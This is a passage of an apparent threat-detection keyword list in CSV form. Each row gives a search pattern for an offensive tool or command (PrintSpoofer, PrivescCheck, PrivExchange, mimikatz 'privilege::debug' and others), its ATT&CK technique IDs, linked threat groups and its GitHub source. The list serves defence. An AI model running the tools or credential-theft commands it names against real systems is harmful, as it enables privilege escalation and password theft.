T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*PrintSpoofer.*",".{0,1000}PrintSpoofer\..{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" 
"*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer.cpp*",".{0,1000}PrintSpoofer\.cpp.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer.exe*",".{0,1000}PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*printspoofer.exe*",".{0,1000}printspoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*printspoofer.py*",".{0,1000}printspoofer\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PrintSpoofer.sln*",".{0,1000}PrintSpoofer\.sln.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer_x64.exe*",".{0,1000}PrintSpoofer_x64\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer32.exe*",".{0,1000}PrintSpoofer32\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer64.exe*",".{0,1000}PrintSpoofer64\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer-master*",".{0,1000}PrintSpoofer\-master.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer-master*",".{0,1000}PrintSpoofer\-master.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpooferNet.exe*",".{0,1000}PrintSpooferNet\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Priv Esc Check Bof*",".{0,1000}Priv\sEsc\sCheck\sBof.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*priv/priv_windows.go*",".{0,1000}priv\/priv_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*privcheck.cna*",".{0,1000}privcheck\.cna.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*privcheck32*",".{0,1000}privcheck32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivEditor.dll*",".{0,1000}PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" 
"*Privesc.psm1*",".{0,1000}Privesc\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Privesc.tests.ps1*",".{0,1000}Privesc\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*privesc_checker*",".{0,1000}privesc_checker.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*privesc_juicy_potato '*",".{0,1000}privesc_juicy_potato\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc_juicy_potato.py*",".{0,1000}privesc_juicy_potato\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - 
T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc_powerup '*",".{0,1000}privesc_powerup\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc_powerup.py*",".{0,1000}privesc_powerup\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc-check*",".{0,1000}privesc\-check.{0,1000}","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. 
databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","10","1455","327","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z" "*PrivescCheck.ps1*",".{0,1000}PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*PrivescCheck_*.*",".{0,1000}PrivescCheck_.{0,1000}\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*PrivescCheckAsciiReport*",".{0,1000}PrivescCheckAsciiReport.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*PrivEscManager.cs*",".{0,1000}PrivEscManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*privexchange.py -d *",".{0,1000}privexchange\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*PrivExchange-master.zip*",".{0,1000}PrivExchange\-master\.zip.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*PrivFu-main.zip*",".{0,1000}PrivFu\-main\.zip.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - 
T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*PrivFu-master*",".{0,1000}PrivFu\-master.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*privilege::backup*",".{0,1000}privilege\:\:backup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::driver*",".{0,1000}privilege\:\:driver.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::id*",".{0,1000}privilege\:\:id.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::name*",".{0,1000}privilege\:\:name.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::restore*",".{0,1000}privilege\:\:restore.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::security*",".{0,1000}privilege\:\:security.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::sysenv*",".{0,1000}privilege\:\:sysenv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::tcb*",".{0,1000}privilege\:\:tcb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Privileged Accounts - Layers Analysis.txt*",".{0,1000}Privileged\sAccounts\s\-\sLayers\sAnalysis\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Final Report.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sFinal\sReport\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of 
